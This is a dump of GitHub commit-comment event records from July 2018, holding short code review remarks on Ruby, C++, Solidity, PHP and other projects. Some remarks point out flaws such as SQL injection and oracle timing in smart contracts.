{"id":"8021234141","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"night1ightning/ruby_course"},"payload":{"comment":{"id":29840372,"position":23,"line":19,"path":"listen1/calculate_ideal_weith.rb","commit_id":"e7ffaba6e58c11bb704544f3b96ec7403929df71","created_at":"2018-07-26T08:34:42Z","updated_at":"2018-07-26T08:34:42Z","author_association":"NONE","body":"скобки тут можно не писать"}},"created_at":"2018-07-26T08:34:42Z"}
{"id":"8021238068","type":"CommitCommentEvent","actor":{"login":"neuroscr"},"repo":{"name":"majestrate/llarp"},"payload":{"comment":{"id":29840380,"position":9,"line":39,"path":"vendor/cppbackport-master/lib/filesystem.h","commit_id":"bbe0634edce05f160b690f367b06558ef76475ba","created_at":"2018-07-26T08:35:29Z","updated_at":"2018-07-26T08:35:29Z","author_association":"CONTRIBUTOR","body":"Linux gcc 7.2 has CPP17 but not filesystem.h"}},"created_at":"2018-07-26T08:35:29Z"}
{"id":"8021238189","type":"CommitCommentEvent","actor":{"login":"vpArth"},"repo":{"name":"MedInTech/php-test-task-timur-isaev"},"payload":{"comment":{"id":29840381,"position":6,"line":8,"path":"class/resol.class.php","commit_id":"3373476f2ec9c97bf1b1b2b75ff8ac36cd0b5ef6","created_at":"2018-07-26T08:35:30Z","updated_at":"2018-07-26T08:35:30Z","author_association":"NONE","body":"Создавать соединение с базой каждый раз, когда оно нужно плохо.\r\nЛучше потребовать передать в конструктор([DI](https://ru.wikipedia.org/wiki/Внедрение_зависимости)) готовый объект базы."}},"created_at":"2018-07-26T08:35:30Z"}
{"id":"8021239189","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29840383,"position":61,"line":64,"path":"contracts/RockPaperScissors.sol","commit_id":"70845492a821aac28b876a273b950da611307999","created_at":"2018-07-26T08:35:42Z","updated_at":"2018-07-26T08:35:42Z","author_association":"NONE","body":"I am worried that player2 makes the mistake of submitting the reveal too early, such that player1 can see the reverted transaction with the revealed choice, and so resubmit a winning commit.\r\n\r\nOr that player2 submits a well-known hash and player1 changes to a winning move."}},"created_at":"2018-07-26T08:35:42Z"}
{"id":"8021241125","type":"CommitCommentEvent","actor":{"login":"neomilium"},"repo":{"name":"opus-codium/melt"},"payload":{"comment":{"id":29840390,"position":null,"line":null,"path":null,"commit_id":"57237646216d83ec07fde7b702fc6a75abd58d8c","created_at":"2018-07-26T08:36:05Z","updated_at":"2018-07-26T08:36:05Z","author_association":"MEMBER","body":"https://github.com/ipaddress-gem/ipaddress/commit/9bbae42b6686d57e3e2909ec67d6d3bf723f6ece\r\nhttps://github.com/ipaddress-gem/ipaddress/commit/fa687f77fdb96bbbd13285f184c93fc15a464eb4\r\nhttps://github.com/ipaddress-gem/ipaddress/commit/81e192ecead751f1abe916af8e667a13c282047c"}},"created_at":"2018-07-26T08:36:05Z"}
{"id":"8021242491","type":"CommitCommentEvent","actor":{"login":"arnold-arinda"},"repo":{"name":"nyabongoedgar/MyDiary"},"payload":{"comment":{"id":29840392,"position":null,"line":null,"path":null,"commit_id":"11388c0413a0e31b4330f8d5aaf6f8da78da59fd","created_at":"2018-07-26T08:36:21Z","updated_at":"2018-07-26T08:36:21Z","author_association":"COLLABORATOR","body":"Good "}},"created_at":"2018-07-26T08:36:21Z"}
{"id":"8021244138","type":"CommitCommentEvent","actor":{"login":"SHANTANUB009"},"repo":{"name":"SHANTANUB009/SparkFun_BNO080_Arduino_Library"},"payload":{"comment":{"id":29840395,"position":null,"line":null,"path":null,"commit_id":"1b659571119013a96ed3e083742355e17cfeca4e","created_at":"2018-07-26T08:36:42Z","updated_at":"2018-07-26T08:36:42Z","author_association":"OWNER","body":"linear acceleration is not working. Can you please help me out."}},"created_at":"2018-07-26T08:36:42Z"}
{"id":"8021244657","type":"CommitCommentEvent","actor":{"login":"Mazda--"},"repo":{"name":"DotOS/android_packages_apps_Dialer"},"payload":{"comment":{"id":29840397,"position":null,"line":null,"path":null,"commit_id":"d368a016b5aac3cd9ba57ed13b0dd1f4a5f782f0","created_at":"2018-07-26T08:36:49Z","updated_at":"2018-07-26T08:36:49Z","author_association":"NONE","body":"You could of just gave Ezio the authorship to begin with too. Don't try to act like this is anything other than a kang on your part. This is just sad, the commit itself is petty and yet you tried to claim credit for it lol"}},"created_at":"2018-07-26T08:36:49Z"}
{"id":"8021245829","type":"CommitCommentEvent","actor":{"login":"tr00tr"},"repo":{"name":"minglich/logitech-pubg"},"payload":{"comment":{"id":29840400,"position":null,"line":null,"path":null,"commit_id":"31e652dbd25ffe42c71191fd44cff07216c41b72","created_at":"2018-07-26T08:37:03Z","updated_at":"2018-07-26T08:37:03Z","author_association":"NONE","body":"@minglich \r\nIs it possible to add 2x scopes? I think it'il be more effective.\r\n"}},"created_at":"2018-07-26T08:37:03Z"}
{"id":"8021249344","type":"CommitCommentEvent","actor":{"login":"jsitnicki"},"repo":{"name":"LorenzoBianconi/rally"},"payload":{"comment":{"id":29840406,"position":62,"line":68,"path":"rally/plugins/common/sla/percentile_time.py","commit_id":"56e1b8f40e89934883e79b127676086719de1a02","created_at":"2018-07-26T08:37:44Z","updated_at":"2018-07-26T08:37:44Z","author_association":"NONE","body":"`range()` is by default from `0`."}},"created_at":"2018-07-26T08:37:44Z"}
{"id":"8021249602","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29840408,"position":96,"line":137,"path":"contracts/RockPaperScissors.sol","commit_id":"34f737617e1a0b960ee931aefad396cf7a53d541","created_at":"2018-07-26T08:37:47Z","updated_at":"2018-07-26T08:37:47Z","author_association":"NONE","body":"The verification **must** use the pure helper. That's the only way you are going to avoid a developer bug in the future:\r\n\r\n```solidity\r\nif (game.commits[numPlayer].action != computeHash(choice,secret)) {\r\n```\r\n"}},"created_at":"2018-07-26T08:37:47Z"}
{"id":"8021254636","type":"CommitCommentEvent","actor":{"login":"neuroscr"},"repo":{"name":"majestrate/llarp"},"payload":{"comment":{"id":29840421,"position":4,"line":185,"path":"llarp/nodedb.cpp","commit_id":"bbe0634edce05f160b690f367b06558ef76475ba","created_at":"2018-07-26T08:38:49Z","updated_at":"2018-07-26T08:38:49Z","author_association":"CONTRIBUTOR","body":"Ok getting pretty crazy. Probably should have a better define for this up at the cmake level. Based on implementation to use."}},"created_at":"2018-07-26T08:38:49Z"}
{"id":"8021255819","type":"CommitCommentEvent","actor":{"login":"mkutny"},"repo":{"name":"ccxt/ccxt"},"payload":{"comment":{"id":29840426,"position":null,"line":null,"path":null,"commit_id":"213130c8102fa17117210cba60f64edeb9b5afe1","created_at":"2018-07-26T08:39:03Z","updated_at":"2018-07-26T08:39:03Z","author_association":"CONTRIBUTOR","body":"@kroitor , why did you decide to delist it? I mean, this 'clone' is not worse than others, is it?"}},"created_at":"2018-07-26T08:39:03Z"}
{"id":"8021263544","type":"CommitCommentEvent","actor":{"login":"timenewbank"},"repo":{"name":"timenewbank/go-mit"},"payload":{"comment":{"id":29840450,"position":null,"line":null,"path":null,"commit_id":"3feafa925365977c870cad8e64aac5ddac0f00ff","created_at":"2018-07-26T08:40:34Z","updated_at":"2018-07-26T08:40:34Z","author_association":"OWNER","body":"fixed web3 js and other BUG at first round testing ."}},"created_at":"2018-07-26T08:40:34Z"}
{"id":"8021266089","type":"CommitCommentEvent","actor":{"login":"AnnieYousar"},"repo":{"name":"openssl/openssl"},"payload":{"comment":{"id":29840457,"position":null,"line":null,"path":null,"commit_id":"feac7a1c8be49fbcb76fcb721ec9f02fdd91030e","created_at":"2018-07-26T08:41:03Z","updated_at":"2018-07-26T08:41:03Z","author_association":"NONE","body":"At least an editorial remark (inconsistent use of bit/bits) to the changes in  `doc/man3/BN_generate_prime.pod`\r\n```\r\n+The rate is 2^-80 starting at 308 bits, 2^-112 at 852 bit, 2^-128 at 1080 bits,\r\n+2^-192 at 3747 bit and 2^-256 at 6394 bit.\r\n```\r\nshould be\r\n```\r\n+The rate is 2^-80 starting at 308 bits, 2^-112 at 852 bits, 2^-128 at 1080 bits,\r\n+2^-192 at 3747 bits and 2^-256 at 6394 bits.\r\n```\r\nSorry for very late comment.\r\n"}},"created_at":"2018-07-26T08:41:03Z"}
{"id":"8021269856","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"r3dpill/Remittance"},"payload":{"comment":{"id":29840463,"position":6,"line":6,"path":"contracts/Remittance.sol","commit_id":"84e23e20206ccfeb6858b807ecf23757c32524ed","created_at":"2018-07-26T08:41:47Z","updated_at":"2018-07-26T08:41:47Z","author_association":"NONE","body":"Is it not what `Stoppable` offers?"}},"created_at":"2018-07-26T08:41:47Z"}
{"id":"8021272566","type":"CommitCommentEvent","actor":{"login":"dr-wilkinson"},"repo":{"name":"dr-wilkinson/traveller"},"payload":{"comment":{"id":29840471,"position":null,"line":null,"path":null,"commit_id":"5ea7f568f2e7bd57ab6a3a839de91e6a1cd08afc","created_at":"2018-07-26T08:42:18Z","updated_at":"2018-07-26T08:42:18Z","author_association":"OWNER","body":"Close #1 "}},"created_at":"2018-07-26T08:42:18Z"}
{"id":"8021274762","type":"CommitCommentEvent","actor":{"login":"vpArth"},"repo":{"name":"MedInTech/php-test-task-timur-isaev"},"payload":{"comment":{"id":29840475,"position":59,"line":29,"path":"class/url.class.php","commit_id":"3373476f2ec9c97bf1b1b2b75ff8ac36cd0b5ef6","created_at":"2018-07-26T08:42:43Z","updated_at":"2018-07-26T08:42:43Z","author_association":"NONE","body":"Хм, SQL инъекция.  `$id` - это пользовательский ввод, может быть чем угодно.\r\n\r\nhttps://github.com/MedInTech/php-test-task-timur-isaev/blob/3373476f2ec9c97bf1b1b2b75ff8ac36cd0b5ef6/moduls/url/edit.url.php#L21\r\n\r\nТак нельзя. Нужно научиться использовать [Подготовленные выражения](http://php.net/manual/ru/mysqli.prepare.php)."}},"created_at":"2018-07-26T08:42:43Z"}
{"id":"8021274991","type":"CommitCommentEvent","actor":{"login":"neuroscr"},"repo":{"name":"majestrate/llarp"},"payload":{"comment":{"id":29840476,"position":16,"line":36,"path":"daemon/dns.cpp","commit_id":"bbe0634edce05f160b690f367b06558ef76475ba","created_at":"2018-07-26T08:42:45Z","updated_at":"2018-07-26T08:42:45Z","author_association":"CONTRIBUTOR","body":"ofc, I'm just saying until it is it needs to stay 8.8.8.8"}},"created_at":"2018-07-26T08:42:45Z"}
{"id":"8021277210","type":"CommitCommentEvent","actor":{"login":"neuroscr"},"repo":{"name":"majestrate/llarp"},"payload":{"comment":{"id":29840483,"position":null,"line":null,"path":null,"commit_id":"bbe0634edce05f160b690f367b06558ef76475ba","created_at":"2018-07-26T08:43:11Z","updated_at":"2018-07-26T08:43:11Z","author_association":"CONTRIBUTOR","body":"Linux gcc 7.2 has CPP17 but no filesystem.h so those cmakefile IFs aren't good enough"}},"created_at":"2018-07-26T08:43:11Z"}
{"id":"8021277292","type":"CommitCommentEvent","actor":{"login":"vpArth"},"repo":{"name":"MedInTech/php-test-task-timur-isaev"},"payload":{"comment":{"id":29840484,"position":83,"line":46,"path":"class/url.class.php","commit_id":"3373476f2ec9c97bf1b1b2b75ff8ac36cd0b5ef6","created_at":"2018-07-26T08:43:12Z","updated_at":"2018-07-26T08:43:12Z","author_association":"NONE","body":"SQL инъекции"}},"created_at":"2018-07-26T08:43:12Z"}
{"id":"8021279056","type":"CommitCommentEvent","actor":{"login":"casperdcl"},"repo":{"name":"tqdm/tqdm"},"payload":{"comment":{"id":29840487,"position":12,"line":null,"path":"tqdm/_tqdm.py","commit_id":"dde670455efd24afed2d617319331efa7642f9be","created_at":"2018-07-26T08:43:32Z","updated_at":"2018-07-26T08:43:32Z","author_association":"MEMBER","body":"Don't think this really reduces the number of operations. The old version would be slightly quicker for hundreds (eg 123M) while the new one favours units (eg 1.23G). Technically the former should be better since an input of `rand(0, 1000)` is much more likely to be `>= 100` than `< 10`."}},"created_at":"2018-07-26T08:43:32Z"}
{"id":"8021280311","type":"CommitCommentEvent","actor":{"login":"vpArth"},"repo":{"name":"MedInTech/php-test-task-timur-isaev"},"payload":{"comment":{"id":29840489,"position":85,"line":48,"path":"class/url.class.php","commit_id":"3373476f2ec9c97bf1b1b2b75ff8ac36cd0b5ef6","created_at":"2018-07-26T08:43:46Z","updated_at":"2018-07-26T08:43:46Z","author_association":"NONE","body":"Не нужно забывать отладочные сообщения в коде."}},"created_at":"2018-07-26T08:43:46Z"}
{"id":"8021280484","type":"CommitCommentEvent","actor":{"login":"Amanda-001"},"repo":{"name":"Amanda-001/Short_Trading_Ideas"},"payload":{"comment":{"id":29840491,"position":null,"line":null,"path":null,"commit_id":"ac45a1cc4b9936308743dfb82ebc870094c1fb68","created_at":"2018-07-26T08:43:47Z","updated_at":"2018-07-26T08:43:47Z","author_association":"OWNER","body":"New branch"}},"created_at":"2018-07-26T08:43:47Z"}
{"id":"8021286970","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"r3dpill/Remittance"},"payload":{"comment":{"id":29840512,"position":72,"line":62,"path":"contracts/Remittance.sol","commit_id":"0f728a6abb67d869ff06455fd197ae8914fac2bb","created_at":"2018-07-26T08:45:01Z","updated_at":"2018-07-26T08:45:01Z","author_association":"NONE","body":"So, to request the payout, do I have to lookup the corresponding `setPayment` transaction, and copy `pwdRecipient` and `pwdValidator` from there? A simple lookup in the blockchain history?\r\nThat does not sound like a challenge to me, or the exchange."}},"created_at":"2018-07-26T08:45:01Z"}
{"id":"8021287019","type":"CommitCommentEvent","actor":{"login":"thaJeztah"},"repo":{"name":"beevik/etree"},"payload":{"comment":{"id":29840513,"position":13,"line":13,"path":"RELEASE_NOTES.md","commit_id":"9d7e8feddccb4ed1b8afb54e368bd323d2ff652c","created_at":"2018-07-26T08:45:02Z","updated_at":"2018-07-26T08:45:02Z","author_association":"NONE","body":"Surprised to find a \"breaking changes\" header in a patch-release; is this library using SemVer?"}},"created_at":"2018-07-26T08:45:02Z"}
{"id":"8021299922","type":"CommitCommentEvent","actor":{"login":"shawn5185"},"repo":{"name":"drkrieger1/TA401DataStructures"},"payload":{"comment":{"id":29840538,"position":3,"line":3,"path":"data_structures/LinkList/LinkList/LinkList.csproj","commit_id":"7984844727a5071a6171f64d12b13f10adb78f23","created_at":"2018-07-26T08:47:19Z","updated_at":"2018-07-26T08:47:19Z","author_association":"NONE","body":"Bsnsmdnf"}},"created_at":"2018-07-26T08:47:19Z"}
{"id":"8021306953","type":"CommitCommentEvent","actor":{"login":"Traderain"},"repo":{"name":"Lim3zer0/CR2WTools"},"payload":{"comment":{"id":29840553,"position":28,"line":56,"path":"CR2W/Types/W3/CBitmapTexture.cs","commit_id":"6e77118d00ecaa175ceb53839f2b98ed9542a0f5","created_at":"2018-07-26T08:48:40Z","updated_at":"2018-07-26T08:48:40Z","author_association":"NONE","body":"Should rather refer to this as: engine\\textures\\texturegroups.xml"}},"created_at":"2018-07-26T08:48:40Z"}
{"id":"8021307771","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"r3dpill/Remittance"},"payload":{"comment":{"id":29840555,"position":82,"line":69,"path":"contracts/Remittance.sol","commit_id":"0f728a6abb67d869ff06455fd197ae8914fac2bb","created_at":"2018-07-26T08:48:50Z","updated_at":"2018-07-26T08:48:50Z","author_association":"NONE","body":"You know that oracles are asynchronous. What `updatePrice` will do is emit an event and come back here. After the transaction is mined, Oraclize's servers will pick up the event, do some things, and put a tx back to your contract. By then, this function call is history."}},"created_at":"2018-07-26T08:48:50Z"}
{"id":"8021314178","type":"CommitCommentEvent","actor":{"login":"mohancm"},"repo":{"name":"DotOS/android_packages_apps_Dialer"},"payload":{"comment":{"id":29840567,"position":null,"line":null,"path":null,"commit_id":"d368a016b5aac3cd9ba57ed13b0dd1f4a5f782f0","created_at":"2018-07-26T08:50:03Z","updated_at":"2018-07-26T08:50:03Z","author_association":"MEMBER","body":"You're right @Mazda-- \r\nIt was a mistake and now it's corrected.\r\nIt won't happening again. Thanks :)"}},"created_at":"2018-07-26T08:50:03Z"}
{"id":"8021314676","type":"CommitCommentEvent","actor":{"login":"YamSaeng"},"repo":{"name":"ProjectGladiator/ProjectJ"},"payload":{"comment":{"id":29840568,"position":null,"line":null,"path":null,"commit_id":"0b01f7b1ede390d1098e4e60f2c368a1bb9a3ee9","created_at":"2018-07-26T08:50:09Z","updated_at":"2018-07-26T08:50:09Z","author_association":"CONTRIBUTOR","body":"구르기에 관련된 남아 있는 변수 제거\r\n회전 상태 추가와 태스크 추가"}},"created_at":"2018-07-26T08:50:09Z"}
{"id":"8021315279","type":"CommitCommentEvent","actor":{"login":"vpArth"},"repo":{"name":"MedInTech/php-test-task-timur-isaev"},"payload":{"comment":{"id":29840570,"position":93,"line":51,"path":"class/url.class.php","commit_id":"3373476f2ec9c97bf1b1b2b75ff8ac36cd0b5ef6","created_at":"2018-07-26T08:50:16Z","updated_at":"2018-07-26T08:50:16Z","author_association":"NONE","body":"Ужасное решение для получения только что вставленного id.  \r\nНа достаточно нагруженной системе MAX(id) может выдавать чужие id. \r\n  это может работать при определённых настройках уровня изоляции транзакций, однако не стоит полагаться на это.  \r\n\r\nВ драйвере базы обычно есть [нативные средства](http://php.net/manual/ru/mysqli.insert-id.php) для этой задачи.\r\n"}},"created_at":"2018-07-26T08:50:16Z"}
{"id":"8021316043","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29840571,"position":null,"line":null,"path":null,"commit_id":"a28f341c2ef3441af8a6b63e4e08fdb4890fc544","created_at":"2018-07-26T08:50:25Z","updated_at":"2018-07-26T08:50:25Z","author_association":"OWNER","body":"# Specs execution successful\r\n:scroll: [View logs](http://bamboo.comnull)\r\n### Plans updated\r\n\r\nBamboo specs have been successfully imported and the following plans have been updated.\r\n\r\nProject | Plan | Build\r\n---|---|---\r\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\r\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\r\n\r\n### Deployments updated\r\n\r\nBamboo specs have been successfully imported and the following deployment projects have been updated.\r\n\r\n|Deployment project |\r\n----|\r\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\r\n"}},"created_at":"2018-07-26T08:50:25Z"}
{"id":"8021317110","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"r3dpill/Remittance"},"payload":{"comment":{"id":29840573,"position":81,"line":68,"path":"contracts/Remittance.sol","commit_id":"0f728a6abb67d869ff06455fd197ae8914fac2bb","created_at":"2018-07-26T08:50:38Z","updated_at":"2018-07-26T08:50:38Z","author_association":"NONE","body":"Oraclize does not come cheap, not sure why you would call `updatePrice` a second time. Why bother call it at setup if your plan is anyway to overwrite it before payout."}},"created_at":"2018-07-26T08:50:38Z"}
{"id":"8021320326","type":"CommitCommentEvent","actor":{"login":"Xaekai"},"repo":{"name":"calzoneman/sync"},"payload":{"comment":{"id":29840581,"position":23,"line":255,"path":"src/io/ioserver.js","commit_id":"67b1c97d8921d894e61a5747af56913205680160","created_at":"2018-07-26T08:51:14Z","updated_at":"2018-07-26T08:51:14Z","author_association":"COLLABORATOR","body":"THUNKED.COM"}},"created_at":"2018-07-26T08:51:14Z"}
{"id":"8021320963","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"r3dpill/Remittance"},"payload":{"comment":{"id":29840583,"position":84,"line":71,"path":"contracts/Remittance.sol","commit_id":"0f728a6abb67d869ff06455fd197ae8914fac2bb","created_at":"2018-07-26T08:51:22Z","updated_at":"2018-07-26T08:51:22Z","author_association":"NONE","body":"You forgot that `this.balance != contractValue` because the `updatePrice` calls took some to pay oraclize."}},"created_at":"2018-07-26T08:51:22Z"}
{"id":"8021321254","type":"CommitCommentEvent","actor":{"login":"CvH"},"repo":{"name":"MediaBrowser/plugin.video.emby"},"payload":{"comment":{"id":29840584,"position":null,"line":null,"path":null,"commit_id":"3d67b79138db61d790549d07aa20aaca36f8c72c","created_at":"2018-07-26T08:51:25Z","updated_at":"2018-07-26T08:51:25Z","author_association":"NONE","body":"`![Kodi](https://github.com/MediaBrowser/plugin.video.emby/blob/develop/kodi_icon.png)`\r\n![Kodi](https://github.com/MediaBrowser/plugin.video.emby/blob/develop/kodi_icon.png)\r\n\r\n`![Kodi](https://raw.githubusercontent.com/MediaBrowser/plugin.video.emby/develop/kodi_icon.png)`\r\n![Kodi](https://raw.githubusercontent.com/MediaBrowser/plugin.video.emby/develop/kodi_icon.png)\r\n\r\n:)"}},"created_at":"2018-07-26T08:51:25Z"}
{"id":"8021325325","type":"CommitCommentEvent","actor":{"login":"Ceciliogq"},"repo":{"name":"Ceciliogq/Spoon-Knife"},"payload":{"comment":{"id":29840594,"position":null,"line":null,"path":null,"commit_id":"fa898213a10220d949ebec1a07e6d6a68ef897c8","created_at":"2018-07-26T08:52:13Z","updated_at":"2018-07-26T08:52:13Z","author_association":"OWNER","body":"Naive change to practice pull"}},"created_at":"2018-07-26T08:52:13Z"}
{"id":"8021327943","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"r3dpill/Remittance"},"payload":{"comment":{"id":29840598,"position":84,"line":71,"path":"contracts/Remittance.sol","commit_id":"0f728a6abb67d869ff06455fd197ae8914fac2bb","created_at":"2018-07-26T08:52:42Z","updated_at":"2018-07-26T08:52:42Z","author_association":"NONE","body":"Also because of Oraclize's asynchrony, `startRate` and `endRate` are not what you think they are."}},"created_at":"2018-07-26T08:52:42Z"}
{"id":"8021329772","type":"CommitCommentEvent","actor":{"login":"samgrande"},"repo":{"name":"DotOS/android_packages_apps_Dialer"},"payload":{"comment":{"id":29840601,"position":null,"line":null,"path":null,"commit_id":"d368a016b5aac3cd9ba57ed13b0dd1f4a5f782f0","created_at":"2018-07-26T08:53:05Z","updated_at":"2018-07-26T08:53:05Z","author_association":"CONTRIBUTOR","body":"\"commit itself is petty\"\r\ntbh is quite a simple commit to kang for ,as you said\r\n\r\nbut if you figure it out yourself its not technically kang ,\r\nthough its should be authored to respect the original commiter andddd i did it (NOW) = PROBLEM SOLVED"}},"created_at":"2018-07-26T08:53:05Z"}
{"id":"8021331260","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"r3dpill/Remittance"},"payload":{"comment":{"id":29840607,"position":72,"line":62,"path":"contracts/Remittance.sol","commit_id":"0f728a6abb67d869ff06455fd197ae8914fac2bb","created_at":"2018-07-26T08:53:21Z","updated_at":"2018-07-26T08:53:21Z","author_association":"NONE","body":"I would make it possible only before the deadline. To avoid competing claims with refund."}},"created_at":"2018-07-26T08:53:21Z"}
{"id":"8021332003","type":"CommitCommentEvent","actor":{"login":"vpArth"},"repo":{"name":"MedInTech/php-test-task-timur-isaev"},"payload":{"comment":{"id":29840623,"position":7,"line":7,"path":"core/database.class.php","commit_id":"3373476f2ec9c97bf1b1b2b75ff8ac36cd0b5ef6","created_at":"2018-07-26T08:53:30Z","updated_at":"2018-07-26T08:53:30Z","author_association":"NONE","body":"Настройки соединения базы в php коде. Невозможно указать конкретные настройки при деплое. Не надо так.\r\n\r\nКак пример того как можно, я добавил json конфигурацию. (См. config/db.json.orig)"}},"created_at":"2018-07-26T08:53:30Z"}
{"id":"8021334625","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"r3dpill/Remittance"},"payload":{"comment":{"id":29840640,"position":113,"line":94,"path":"contracts/Remittance.sol","commit_id":"0f728a6abb67d869ff06455fd197ae8914fac2bb","created_at":"2018-07-26T08:53:59Z","updated_at":"2018-07-26T08:53:59Z","author_association":"NONE","body":"Again, it is highly hypothetical that the contract still has enough to pay out this virtual amount."}},"created_at":"2018-07-26T08:53:59Z"}
{"id":"8021335312","type":"CommitCommentEvent","actor":{"login":"vit9696"},"repo":{"name":"vit9696/sdl-gpu"},"payload":{"comment":{"id":29840643,"position":null,"line":null,"path":null,"commit_id":"561387f4b17441e05015f87f6b5004e113af9951","created_at":"2018-07-26T08:54:06Z","updated_at":"2018-07-26T08:54:06Z","author_association":"OWNER","body":"@grimfang4, do you refer to this commit in [this message](\r\nhttps://github.com/grimfang4/sdl-gpu/commit/c638d981541d7142ee23b67b4949167628ebeb4d#commitcomment-29832062)? From what I remember it is broken for us with triangle blitting."}},"created_at":"2018-07-26T08:54:06Z"}
{"id":"8021336812","type":"CommitCommentEvent","actor":{"login":"ProgTrade"},"repo":{"name":"ProgTrade/nUpdate"},"payload":{"comment":{"id":29840647,"position":5,"line":15,"path":"nUpdate.UpdateInstaller/Core/ProgressReporterService.cs","commit_id":"24fbd405017e874e17cbd8af024f86f5fc71e0d9","created_at":"2018-07-26T08:54:22Z","updated_at":"2018-07-26T08:54:22Z","author_association":"OWNER","body":"I am thinking about this problem mentioned here: https://stackoverflow.com/questions/2397162/how-to-determine-if-starting-inside-a-windows-service\r\n\r\nMaybe we should use the same approach as in the answer to determine, if this is as service. That would be safe in any case."}},"created_at":"2018-07-26T08:54:22Z"}
{"id":"8021337126","type":"CommitCommentEvent","actor":{"login":"fildunsky"},"repo":{"name":"esteemapp/esteem-surfer"},"payload":{"comment":{"id":29840649,"position":null,"line":null,"path":null,"commit_id":"be85d585480005b2a98ffccb6364a9b44d433a21","created_at":"2018-07-26T08:54:26Z","updated_at":"2018-07-26T08:54:26Z","author_association":"MEMBER","body":"Yes, some paddings could be good. And current edition post indicator could be blue...\r\n\r\n![post_history](https://user-images.githubusercontent.com/32987666/43252150-808e6d66-90ca-11e8-82a6-f7109cf3fdf0.png)"}},"created_at":"2018-07-26T08:54:26Z"}
{"id":"8021337837","type":"CommitCommentEvent","actor":{"login":"vit9696"},"repo":{"name":"grimfang4/sdl-gpu"},"payload":{"comment":{"id":29840651,"position":null,"line":null,"path":null,"commit_id":"c638d981541d7142ee23b67b4949167628ebeb4d","created_at":"2018-07-26T08:54:35Z","updated_at":"2018-07-26T08:54:35Z","author_association":"NONE","body":"Hmm, have a look: \r\nhttps://github.com/vit9696/sdl-gpu/commit/561387f4b17441e05015f87f6b5004e113af9951#commitcomment-29840643"}},"created_at":"2018-07-26T08:54:35Z"}
{"id":"8021338630","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"r3dpill/Remittance"},"payload":{"comment":{"id":29840653,"position":86,"line":73,"path":"contracts/Remittance.sol","commit_id":"0f728a6abb67d869ff06455fd197ae8914fac2bb","created_at":"2018-07-26T08:54:44Z","updated_at":"2018-07-26T08:54:44Z","author_association":"NONE","body":"Not sure why you would use an expensive storage `toSend` to store a transient value."}},"created_at":"2018-07-26T08:54:44Z"}
{"id":"8021341243","type":"CommitCommentEvent","actor":{"login":"doktornotor"},"repo":{"name":"PiBa-NL/FreeBSD-ports"},"payload":{"comment":{"id":29840658,"position":10,"line":37,"path":"net/pfSense-pkg-haproxy-devel/files/usr/local/www/haproxy/haproxy_files.php","commit_id":"7c2caf5a2b8f4169832e30d03ab8987198f86bda","created_at":"2018-07-26T08:55:13Z","updated_at":"2018-07-26T08:55:13Z","author_association":"NONE","body":"Needs to stay there, no files shown otherwise. Ditto for line 45."}},"created_at":"2018-07-26T08:55:13Z"}
{"id":"8021341547","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"r3dpill/Remittance"},"payload":{"comment":{"id":29840659,"position":116,"line":97,"path":"contracts/Remittance.sol","commit_id":"0f728a6abb67d869ff06455fd197ae8914fac2bb","created_at":"2018-07-26T08:55:16Z","updated_at":"2018-07-26T08:55:16Z","author_association":"NONE","body":"It is better you emit before the transfer. If the recipient also emits it will look out of order."}},"created_at":"2018-07-26T08:55:16Z"}
{"id":"8021343778","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"r3dpill/Remittance"},"payload":{"comment":{"id":29840663,"position":128,"line":110,"path":"contracts/Remittance.sol","commit_id":"0f728a6abb67d869ff06455fd197ae8914fac2bb","created_at":"2018-07-26T08:55:41Z","updated_at":"2018-07-26T08:55:41Z","author_association":"NONE","body":"This should be removed when you are done with tests."}},"created_at":"2018-07-26T08:55:41Z"}
{"id":"8021344016","type":"CommitCommentEvent","actor":{"login":"vpArth"},"repo":{"name":"MedInTech/php-test-task-timur-isaev"},"payload":{"comment":{"id":29840664,"position":50,"line":29,"path":"core/table.class.php","commit_id":"3373476f2ec9c97bf1b1b2b75ff8ac36cd0b5ef6","created_at":"2018-07-26T08:55:44Z","updated_at":"2018-07-26T08:55:44Z","author_association":"NONE","body":"Пример того, как может выглядеть HTML-хелпер. Лучше, конечно, выносить шаблоны в отдельные файлы.\r\nПортянку из echo невозможно ни читать, ни поддерживать."}},"created_at":"2018-07-26T08:55:44Z"}
{"id":"8021344630","type":"CommitCommentEvent","actor":{"login":"ProgTrade"},"repo":{"name":"ProgTrade/nUpdate"},"payload":{"comment":{"id":29840667,"position":null,"line":null,"path":null,"commit_id":"24fbd405017e874e17cbd8af024f86f5fc71e0d9","created_at":"2018-07-26T08:55:51Z","updated_at":"2018-07-26T08:55:51Z","author_association":"OWNER","body":"Thanks for the fix. As soon as we handle the problem mentioned in my comment above, I‘ll merge it."}},"created_at":"2018-07-26T08:55:51Z"}
